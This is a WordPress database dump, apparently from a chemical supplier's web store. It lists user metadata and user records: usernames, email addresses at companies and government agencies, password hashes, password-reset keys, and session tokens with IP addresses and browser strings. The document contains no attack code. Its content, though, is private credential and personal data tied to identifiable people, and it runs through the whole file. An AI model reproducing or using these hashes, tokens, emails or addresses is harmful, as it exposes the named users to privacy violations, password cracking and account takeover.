INSERT INTO `wp_usermeta` VALUES (35549, 2512, 'nickname', 'support1954'); 
INSERT INTO `wp_usermeta` VALUES (35550, 2512, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35551, 2512, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35552, 2512, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (35553, 2512, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35554, 2512, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (35555, 2512, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (35556, 2512, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (35557, 2512, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35558, 2512, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (35559, 2512, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (35560, 2512, '_yoast_wpseo_profile_updated', '1503364934'); 
INSERT INTO `wp_usermeta` VALUES (35561, 2512, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (35562, 2513, 'nickname', 'justmevt8281997'); 
INSERT INTO `wp_usermeta` VALUES (35563, 2513, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35564, 2513, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35565, 2513, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (35566, 2513, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35567, 2513, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (35568, 2513, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (35569, 2513, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (35570, 2513, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35571, 2513, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (35572, 2513, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (35573, 2513, '_yoast_wpseo_profile_updated', '1503366708'); 
INSERT INTO `wp_usermeta` VALUES (35574, 2513, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (35575, 2514, 'nickname', 'kristalack1951'); 
INSERT INTO `wp_usermeta` VALUES (35576, 2514, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35577, 2514, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35578, 2514, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (35579, 2514, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35580, 2514, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (35581, 2514, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (35582, 2514, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (35583, 2514, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35584, 2514, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (35585, 2514, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (35586, 2514, '_yoast_wpseo_profile_updated', '1503370846'); 
INSERT INTO `wp_usermeta` VALUES (35587, 2514, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (35588, 2515, 'nickname', 'dakotademmonsyy7048'); 
INSERT INTO `wp_usermeta` VALUES (35589, 2515, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35590, 2515, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35591, 2515, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (35592, 2515, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35593, 2515, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (35594, 2515, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (35595, 2515, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (35596, 2515, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35597, 2515, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (35598, 2515, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (35599, 2515, '_yoast_wpseo_profile_updated', '1503375637'); 
INSERT INTO `wp_usermeta` VALUES (35600, 2515, 'session_tokens', 'a:1:{s:64:"b41676be874088c881e5a70f1eb4671372893c80d5e35e652c5a19e338c5885f";a:4:{s:10:"expiration";i:1504585247;s:2:"ip";s:14:"191.101.66.215";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1503375647;}}'); 
INSERT INTO `wp_usermeta` VALUES (35601, 2515, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (35602, 2516, 'nickname', 'rafaelbs1979'); 
INSERT INTO `wp_usermeta` VALUES (35603, 2516, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35604, 2516, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35605, 2516, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (35606, 2516, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35607, 2516, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (35608, 2516, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (35609, 2516, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (35610, 2516, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35611, 2516, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (35612, 2516, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (35613, 2516, '_yoast_wpseo_profile_updated', '1503378184'); 
INSERT INTO `wp_usermeta` VALUES (35614, 2516, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (35615, 2517, 'nickname', 'barrattdawn2007'); 
INSERT INTO `wp_usermeta` VALUES (35616, 2517, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35617, 2517, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35618, 2517, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (35619, 2517, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35620, 2517, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (35621, 2517, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (35622, 2517, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (35623, 2517, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35624, 2517, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (35625, 2517, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (35626, 2517, '_yoast_wpseo_profile_updated', '1503399450'); 
INSERT INTO `wp_usermeta` VALUES (35627, 2517, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (35628, 2518, 'nickname', 'bam04751979'); 
INSERT INTO `wp_usermeta` VALUES (35629, 2518, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35630, 2518, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35631, 2518, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (35632, 2518, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35633, 2518, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (35634, 2518, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (35635, 2518, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (35636, 2518, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35637, 2518, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (35638, 2518, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (35639, 2518, '_yoast_wpseo_profile_updated', '1503410675'); 
INSERT INTO `wp_usermeta` VALUES (35640, 2518, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (35641, 2519, 'nickname', 'chauhan1234431956'); 
INSERT INTO `wp_usermeta` VALUES (35642, 2519, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35643, 2519, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35644, 2519, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (35645, 2519, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35646, 2519, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (35647, 2519, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (35648, 2519, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (35649, 2519, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35650, 2519, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (35651, 2519, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (35652, 2519, '_yoast_wpseo_profile_updated', '1503411112'); 
INSERT INTO `wp_usermeta` VALUES (35653, 2519, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (35654, 2520, 'nickname', 'giovanny9061960'); 
INSERT INTO `wp_usermeta` VALUES (35655, 2520, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35656, 2520, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35657, 2520, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (35658, 2520, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35659, 2520, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (35660, 2520, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (35661, 2520, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (35662, 2520, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35663, 2520, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (35664, 2520, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (35665, 2520, '_yoast_wpseo_profile_updated', '1503411117'); 
INSERT INTO `wp_usermeta` VALUES (35666, 2520, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (35668, 2521, 'nickname', 'julia.angwin1981'); 
INSERT INTO `wp_usermeta` VALUES (35669, 2521, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35670, 2521, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35671, 2521, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (35672, 2521, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35673, 2521, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (35674, 2521, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (35675, 2521, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (35676, 2521, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35677, 2521, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (35678, 2521, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (35679, 2521, '_yoast_wpseo_profile_updated', '1503412383'); 
INSERT INTO `wp_usermeta` VALUES (35680, 2521, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (35681, 2522, 'nickname', 'judy.benckendorf'); 
INSERT INTO `wp_usermeta` VALUES (35682, 2522, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35683, 2522, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (35684, 2522, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (35685, 2522, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35686, 2522, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (35687, 2522, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (35688, 2522, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (35689, 2522, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (35690, 2522, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (35691, 2522, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (35692, 2522, '_yoast_wpseo_profile_updated', '1503413861'); 
INSERT INTO `wp_usermeta` VALUES (35693, 2522, 'session_tokens', 'a:1:{s:64:"d7798905ec8c8f01aa328569377af0bfa25f56642fe18320ea26a58c3ff57ea9";a:4:{s:10:"expiration";i:1504623469;s:2:"ip";s:14:"138.163.106.71";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1503413869;}}');
#
# End of data contents of table `wp_usermeta`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_users`


#
# Delete any existing table `wp_users`
#

DROP TABLE IF EXISTS `wp_users`;


#
# Table structure of table `wp_users`
#

CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_pass` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_nicename` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_url` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=2523 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_users`
#
 
INSERT INTO `wp_users` VALUES (1, 'ddillulio@mschem.com', '$P$B/ueDQuidRn1Ed3RFNdt3dh0smVoR6/', 'ddilluliomschem-com', 'ddillulio@mschem.com', '', '2016-08-15 18:57:31', '', 0, 'ddillulio@mschem.com'); 
INSERT INTO `wp_users` VALUES (2, 'zayyan', '$P$By9KX99xR9GkpMvWrmWtxrxrLY4hKw/', 'zayyan', 'zchowdhury@mschem.com', '', '2016-08-16 18:51:04', '1495808102:$P$BRzH1FDMc/57C1AOPgWzWqkCwJJBgu0', 0, 'Zayyan Chowdhury'); 
INSERT INTO `wp_users` VALUES (3, 'cpavlik@mschem.com', '$P$B/yPzvhsfrEHzrPNu.TWDbiXLot82a/', 'cpavlikmschem-com', 'cpavlik@mschem.com', '', '2016-08-16 18:55:57', '1471373758:$P$BVf9Rx272ehMKdfSLU4ZihGrhX82IU0', 0, 'Chris Pavlik'); 
INSERT INTO `wp_users` VALUES (5, 'Melissa', '$P$B0s6C8qMKPWyMLkeT23Y//fegOHLN61', 'melissa', 'Melissa@kemperstraps.com', '', '2016-09-27 12:40:21', '', 0, 'Melissa'); 
INSERT INTO `wp_users` VALUES (6, 'cmehta', '$P$BUEvkhvQM8ozFjIyR6TXJIXSGzrkeH/', 'cmehta', 'cmehta@mschem.com', '', '2016-09-27 15:31:19', '1493915621:$P$BWSRVn9ICnOIWLhO/M.a69ui718wel0', 0, 'cmehta'); 
INSERT INTO `wp_users` VALUES (7, 'dollielajeunesselj2225', '$P$BNGFkEEK1uMaCpDVBmE4leST7Sp2yJ1', 'dollielajeunesselj2225', 'dollielajeunesselj2225@yahoo.com', '', '2016-09-28 02:00:56', '', 0, 'dollielajeunesselj2225'); 
INSERT INTO `wp_users` VALUES (8, 'asmith', '$P$BbQCfVFsAa.Rf8aYJ3eDKvu7.p2cqV.', 'asmith', 'asmith@ehs.com', '', '2016-09-28 04:36:56', '1486724988:$P$BqViWQxcYmKvpCR3mU78ixwx3dgOMe/', 0, 'asmith'); 
INSERT INTO `wp_users` VALUES (9, 'ecarter', '$P$BHY06wDWi/6vhdmqOHDeQelhOF1q94.', 'ecarter', 'ecarter@ehs.com', '', '2016-09-28 05:59:14', '', 0, 'ecarter'); 
INSERT INTO `wp_users` VALUES (10, 'jjjjj', '$P$BzM9LI.Ot60ZUj1qHcZ6lqXlCjW38D1', 'jjjjj', 'jjjjj@jjjj.com', '', '2016-09-28 12:43:02', '', 0, 'jjjjj'); 
INSERT INTO `wp_users` VALUES (11, 'lwilson', '$P$BgAOgwkD2OaH9ixLebSo2r3kTILsLQ0', 'lwilson', 'lwilson@rosemedical.com', '', '2016-09-28 14:17:51', '', 0, 'lwilson'); 
INSERT INTO `wp_users` VALUES (12, 'sfalcone', '$P$Blz8kDIa9VNKGqqyi/lsPLYCZX9XIB0', 'sfalcone', 'sfalcone@mschem.com', '', '2016-09-28 14:45:49', '', 0, 'sfalcone'); 
INSERT INTO `wp_users` VALUES (13, 'hienautotech', '$P$BIfmYZVygSWfMt.ZrC0I0DDK8QFux4.', 'hienautotech', 'hienautotech@gmail.com', '', '2016-09-28 15:22:04', '', 0, 'hienautotech'); 
INSERT INTO `wp_users` VALUES (14, 's.gater', '$P$BZX//9QQTh0vsUMviffRltP4X9swUP0', 's-gater', 's.gater@itech-instruments.com', '', '2016-09-28 15:26:48', '', 0, 's.gater'); 
INSERT INTO `wp_users` VALUES (15, 'jarelis.roman2', '$P$B4/y7bKQwpO.ZPS35vNUPZ2MuwuIYe0', 'jarelis-roman2', 'jarelis.roman2@pw.utc.com', '', '2016-09-28 19:17:46', '', 0, 'jarelis.roman2'); 
INSERT INTO `wp_users` VALUES (16, 'shujie.yang', '$P$BxI9C6rk6taqcgehMCLInl4ekFBiaV/', 'shujie-yang', 'shujie.yang@duke.com', '', '2016-09-28 20:46:16', '', 0, 'shujie.yang'); 
INSERT INTO `wp_users` VALUES (17, 'lynnb', '$P$BouVtfT0m3jFSvAbm2AH.r9zNxjnSf.', 'lynnb', 'lynnb@mschem.com', '', '2016-09-29 02:24:27', '', 0, 'lynnb'); 
INSERT INTO `wp_users` VALUES (18, 'rex.blackwell', '$P$BHiB5NLzByCYFrN1/1A1Al2/uRMbOb0', 'rex-blackwell', 'rex.blackwell@psgdover.com', '', '2016-09-29 12:08:04', '', 0, 'rex.blackwell'); 
INSERT INTO `wp_users` VALUES (19, 'carol.quackenbush', '$P$B7E05W9Iyc7OEWDG0yMvCePGDGWLnn1', 'carol-quackenbush', 'carol.quackenbush@apitech.com', '', '2016-09-29 13:24:11', '', 0, 'carol.quackenbush'); 
INSERT INTO `wp_users` VALUES (20, 'kmsoulliere', '$P$BRynfB.n74usebtI.3jeMueUknB1Zx.', 'kmsoulliere', 'kmsoulliere@michsci.com', '', '2016-09-29 14:13:05', '', 0, 'kmsoulliere'); 
INSERT INTO `wp_users` VALUES (21, 'keith.crider', '$P$Bmx9SLIfxMLD3cZRcLfYKkrIJXZ0uM/', 'keith-crider', 'keith.crider@ngc.com', '', '2016-09-29 21:57:30', '', 0, 'keith.crider'); 
INSERT INTO `wp_users` VALUES (22, 'athongs', '$P$BElNsnFhVoO2WmcIpLP1JUTIf14ioR1', 'athongs', 'athongs@celestica.com', '', '2016-09-30 04:22:56', '', 0, 'athongs'); 
INSERT INTO `wp_users` VALUES (23, 'michael.zurek', '$P$ByfqGKHsp5dYmYUmaVCV6k9LjIUfBw0', 'michael-zurek', 'michael.zurek@scientificgames.com', '', '2016-09-30 13:25:50', '', 0, 'michael.zurek'); 
INSERT INTO `wp_users` VALUES (24, 'michael.b.taylor1', '$P$BN9EAMMaFpBay0yh34Sn6OhYWS4L8B/', 'michael-b-taylor1', 'michael.b.taylor1@navy.mil', '', '2016-09-30 17:45:59', '1493657722:$P$BAk7TiI0GOc./5ufYyYrcIP7xOu0UQ.', 0, 'michael.b.taylor1'); 
INSERT INTO `wp_users` VALUES (25, 'CA Sales', '$P$BxscX.bcQAKkVN3ze2OKcjJpUORl4r.', 'ca-sales', 'casales@mschem.com', 'https://www.miller-stephenson.com', '2016-09-30 18:13:32', '1475259213:$P$BQh0mQlKsf.ZM0RS3D9iJtz6gT/YTg/', 0, 'Diane Bonfert'); 
INSERT INTO `wp_users` VALUES (26, 'Leah', '$P$BH.WqWKP0MtIntwj1HGfHqSqxWchBR/', 'leah', 'Leah@uwestech.com.sg', '', '2016-10-03 04:32:24', '', 0, 'Leah'); 
INSERT INTO `wp_users` VALUES (27, 'brian.guffy', '$P$BNE8oO6rR4ubKeYvhQ/XBcNWdI9iRm1', 'brian-guffy', 'brian.guffy@yahoo.com', '', '2016-10-03 16:53:00', '', 0, 'brian.guffy'); 
INSERT INTO `wp_users` VALUES (28, 'leslieu', '$P$BnSjrkT0qslaHvNOZCYQ23kzRRzQDB.', 'leslieu', 'leslieu@aheadtek.com', '', '2016-10-03 18:35:55', '1500998134:$P$BAvnG44XkqDsGukyIDkgYNtgx6ZzcD0', 0, 'leslieu'); 
INSERT INTO `wp_users` VALUES (29, 'trishas', '$P$Bv.r/dX4XdZHTADK7vgIyKLgS9cnsx1', 'trishas', 'trishas@thordonbearings.com', '', '2016-10-03 19:33:31', '', 0, 'trishas'); 
INSERT INTO `wp_users` VALUES (30, 'thite', '$P$BrdjrLPqMg1h3zLeGzlTT/cK8lnWJt/', 'thite', 'thite@ehs.com', '', '2016-10-03 19:58:28', '', 0, 'thite'); 
INSERT INTO `wp_users` VALUES (31, 'rwilliams', '$P$BtbdlngKCf0uKZJMb4QqXgjmWQw/gk/', 'rwilliams', 'rwilliams@lsisolutions.com', '', '2016-10-03 20:52:56', '', 0, 'rwilliams'); 
INSERT INTO `wp_users` VALUES (32, 'mark.t.fletcher', '$P$BJT7QGU.LnD7jD62LShECn7YIb/m1Y.', 'mark-t-fletcher', 'mark.t.fletcher@faa.gov', '', '2016-10-03 21:05:53', '', 0, 'mark.t.fletcher'); 
INSERT INTO `wp_users` VALUES (33, 'sales', '$P$BQZmcIEJj3WxChVuo1ITXxIg97jPvy1', 'sales', 'sales@zungchem.com', '', '2016-10-04 07:58:30', '1485129845:$P$B4JGCuP8q912UVyUqGzY1L0jJlVeeD.', 0, 'sales'); 
INSERT INTO `wp_users` VALUES (34, 'ilsales', '$P$BdJqwVMPmUyuhai.RnWwWorpFZg7RV0', 'ilsales', 'ilsales@mschem.com', '', '2016-10-04 14:44:35', '', 0, 'ilsales'); 
INSERT INTO `wp_users` VALUES (35, 'info', '$P$B/W4lYQA1m6b2VbsTEG/Z0OoJBpZvm0', 'info', 'info@mschem.com', '', '2016-10-04 16:01:32', '', 0, 'info'); 
INSERT INTO `wp_users` VALUES (36, 'jim', '$P$BFVC2XxDuYqp3KMNm0Im08.lifH9Og1', 'jim', 'jim@ehs-sos.com', '', '2016-10-04 16:47:07', '', 0, 'jim'); 
INSERT INTO `wp_users` VALUES (37, 'nicholas.gurrisi', '$P$BnpkNU7W6Kx392XlEJD2ySGNz.h8Fu.', 'nicholas-gurrisi', 'nicholas.gurrisi@cfa.harvard.edu', '', '2016-10-05 12:53:34', '', 0, 'nicholas.gurrisi'); 
INSERT INTO `wp_users` VALUES (38, 'mubetcel', '$P$BhgOFFvDHXsX.JiW.0zDvlz8qRPWr50', 'mubetcel', 'mubetcel@s2rlab.com', '', '2016-10-05 14:20:18', '1490112727:$P$BLiOOWd.YOeyeQfI.gNhiu41BRHPkN/', 0, 'mubetcel'); 
INSERT INTO `wp_users` VALUES (39, 'WMAROTTA', '$P$Bn7zj95gTezW0AfwM.5y.lkclIWocT/', 'wmarotta', 'WMAROTTA@MSCHEM.COM', '', '2016-10-05 14:54:42', '', 0, 'WMAROTTA'); 
INSERT INTO `wp_users` VALUES (40, 'darrel.ruby', '$P$BI7avDlifcE46nkgb22/pCYWxylCzS0', 'darrel-ruby', 'darrel.ruby@nokia.com', '', '2016-10-05 14:56:01', '', 0, 'darrel.ruby'); 
INSERT INTO `wp_users` VALUES (41, 'MAL', '$P$BFGRqwfhOOihFX6n8jzdoeCff8Qpn90', 'mal', 'MAL@AEROHARDWAREPARTS.COM', '', '2016-10-05 15:56:18', '', 0, 'MAL'); 
INSERT INTO `wp_users` VALUES (42, 'Charlie', '$P$BlLKEelCwLI9WRdEzUj7Z1epHaJOkw.', 'charlie', 'Charlie@beyondgreenairservices.com', '', '2016-10-05 18:03:09', '', 0, 'Charlie'); 
INSERT INTO `wp_users` VALUES (43, 'sue.emery', '$P$Blfh/Ri4lx2ZsxmMB841CurpZRYXEo0', 'sue-emery', 'sue.emery@hunterdouglas.com', '', '2016-10-05 18:21:32', '', 0, 'sue.emery'); 
INSERT INTO `wp_users` VALUES (44, 'mariah.voskamp', '$P$B0KFRDDQPsquIPAKjMOFMnoLsOsCqB.', 'mariah-voskamp', 'mariah.voskamp@l3com.com', '', '2016-10-05 20:21:22', '', 0, 'mariah.voskamp'); 
INSERT INTO `wp_users` VALUES (45, 'sam', '$P$BMbuhaQU5vRt1jR8.QW45zGQmFqf3f.', 'sam', 'sam@m3vsoftware.com', '', '2016-10-06 09:44:53', '', 0, 'sam'); 
INSERT INTO `wp_users` VALUES (46, 'matthew.kremer', '$P$BVOQthYvTdOqIDdmLO2PacYoHbLKfh0', 'matthew-kremer', 'matthew.kremer@danfoss.com', '', '2016-10-06 17:38:54', '', 0, 'matthew.kremer'); 
INSERT INTO `wp_users` VALUES (47, 'tanderson', '$P$BzqkTMkwSO8t2Zzz1MI3MfbcIjEhKq.', 'tanderson', 'tanderson@jeron.com', '', '2016-10-06 18:22:46', '', 0, 'tanderson'); 
INSERT INTO `wp_users` VALUES (48, 'sbidwell', '$P$BOww.r0q6qZBLww10zKoc/FlCGUm9e/', 'sbidwell', 'sbidwell@cardinalhs.net', '', '2016-10-06 18:23:03', '', 0, 'sbidwell'); 
INSERT INTO `wp_users` VALUES (49, 'Anna.Pratt', '$P$B4t1fo3ATDaKfjVyMIrd1vQKpYRjbI0', 'anna-pratt', 'Anna.Pratt@va.gov', '', '2016-10-06 19:43:49', '', 0, 'Anna.Pratt'); 
INSERT INTO `wp_users` VALUES (50, 'jfrancisco', '$P$BCFuDoWCoEdFTuiY9/i7EaixBBxVC41', 'jfrancisco', 'jfrancisco@nwl.com', '', '2016-10-07 12:19:32', '', 0, 'jfrancisco'); 
INSERT INTO `wp_users` VALUES (51, 'jboyd', '$P$BCvCHV/ERuTRTbtuSdWBiaapbatLTz.', 'jboyd', 'jboyd@ppg.com', '', '2016-10-07 14:55:42', '1490037779:$P$BoiPSL3eHtFHJUBE2EjkJcTFpeW7X31', 0, 'jboyd'); 
INSERT INTO `wp_users` VALUES (52, 'clayton.garrett', '$P$BOww5RhUGM.LrtWfXdi0BgXVl3YKRi.', 'clayton-garrett', 'clayton.garrett@dynamicinst.com', '', '2016-10-07 15:10:26', '', 0, 'clayton.garrett'); 
INSERT INTO `wp_users` VALUES (53, 'eric.putnam', '$P$BBdGd/facH53Wsgj0gWp75M4Ifo9Z41', 'eric-putnam', 'eric.putnam@newport.com', '', '2016-10-07 17:01:05', '', 0, 'eric.putnam'); 
INSERT INTO `wp_users` VALUES (54, 'richardsc', '$P$Bo30Ez8Srbim9M7km6LLW0US7ycs4q0', 'richardsc', 'richardsc@gdsiswitches.com', '', '2016-10-07 17:49:24', '', 0, 'richardsc'); 
INSERT INTO `wp_users` VALUES (55, 'mkipphorn', '$P$BeC1r2X6COYHrxA.YjxTKki4OlORF2.', 'mkipphorn', 'mkipphorn@tainstruments.com', '', '2016-10-07 19:26:44', '', 0, 'mkipphorn'); 
INSERT INTO `wp_users` VALUES (56, 'laura.ferriere', '$P$BjBd/R5QOkQb1nwvHxSFWQVqGME8Zv1', 'laura-ferriere', 'laura.ferriere@sodern.fr', '', '2016-10-10 09:31:43', '', 0, 'laura.ferriere'); 
INSERT INTO `wp_users` VALUES (57, 'hillj.ctr', '$P$BG6Y6jisZcfyjvQNb4DKoguSn4o2Fu1', 'hillj-ctr', 'hillj.ctr@ginl.state.gov', '', '2016-10-10 14:38:45', '', 0, 'hillj.ctr'); 
INSERT INTO `wp_users` VALUES (58, 'eric.hudak', '$P$BCeBjq9LMiVjqQh0uDLBdMDvVYrYlO.', 'eric-hudak', 'eric.hudak@advancedbionics.com', '', '2016-10-10 18:10:28', '', 0, 'eric.hudak'); 
INSERT INTO `wp_users` VALUES (59, 'crood', '$P$B1/rGUKuxA0TccLa8K7JbH5YJVS.k31', 'crood', 'crood@dymax.com', '', '2016-10-10 18:37:15', '', 0, 'crood'); 
